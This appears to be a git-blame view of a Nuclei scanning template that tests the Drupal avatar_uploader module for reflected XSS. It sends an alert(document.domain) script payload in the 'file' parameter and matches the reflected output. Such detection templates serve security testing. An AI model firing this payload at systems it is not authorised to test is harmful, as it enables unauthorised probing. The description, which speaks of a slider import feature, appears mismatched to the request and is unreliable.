2022-07-06 17:45:18 +00:00
id : drupal-avatar-xss
2022-07-06 17:40:05 +00:00
info :
2022-09-09 17:34:37 +00:00
name : Drupal avatar_uploader v7.x-1.0-beta8 - Cross-Site Scripting
2022-07-06 17:40:05 +00:00
author : bywalks
severity : medium
description : |
This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
reference :
- https://www.exploit-db.com/exploits/50841
2022-08-27 04:41:18 +00:00
tags : xss,drupal,edb
2022-07-06 17:40:05 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-07-06 17:45:18 +00:00
- "<div><script>alert(document.domain)</script></div>"
2022-07-06 17:40:05 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200